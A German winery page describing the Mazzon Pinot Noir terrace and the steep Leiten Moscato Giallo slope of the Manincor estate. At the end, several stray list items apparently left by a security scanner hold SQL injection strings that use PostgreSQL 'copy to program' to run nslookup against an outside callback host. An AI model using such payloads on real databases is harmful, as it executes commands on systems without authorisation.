Die Manincor Lagen ~ Mazzon und Leiten

Mazzon. Vier Hektar sind in dieser einmaligen Lage mit Pinot Noir für den Manincor Blauburgunder Mason und der Selektion alter Reben Masin di Mason bestockt. Leiten. Eine sehr steile Hanglage mit extremer Sonnenexposition für den Moscato Giallo.

Mazzon. Auf einer leicht nach Süden geneigten Terrasse stehen unsere Pinot Noir-Stöcke in Nord-Süd-Richtung. So können die Trauben perfekt reifen. Sie werden einerseits von der Sonne von morgens bis abends verwöhnt und andererseits vom Nordwind am Morgen und vom Südwind am Nachmittag durchlüftet. Der eiszeitliche Moränenboden ist zudem Garant für Wachstumsharmonie. Niedrigste Erträge durch kleine Trauben und Beeren machen kein Ausdünnen notwendig. Ein echter Grand Cru-Weinberg, der sich in den Manincor Weinen mit all seiner Individualität ausdrückt.

Leiten. 100 % Gefälle, nach Süden und Südwesten abfallend, bilden die Besonderheit dieser Extremlage. Hier reift der Gelbe Muskateller zur wirklichen Aromareife, goldig und ohne vegetale Noten. Dies ist die Voraussetzung um diese interessante Sorte als feinen Wein trocken auszubauen.

  • testing';copy (select '') to program 'nslookup dns.sqli.55065.73502-4674.73502.3466f.1.bxss.me
  • testing
  • testing';copy (select '') to program 'nslookup dns.sqli.55065.73502-9440.73502.71036.1.bxss.me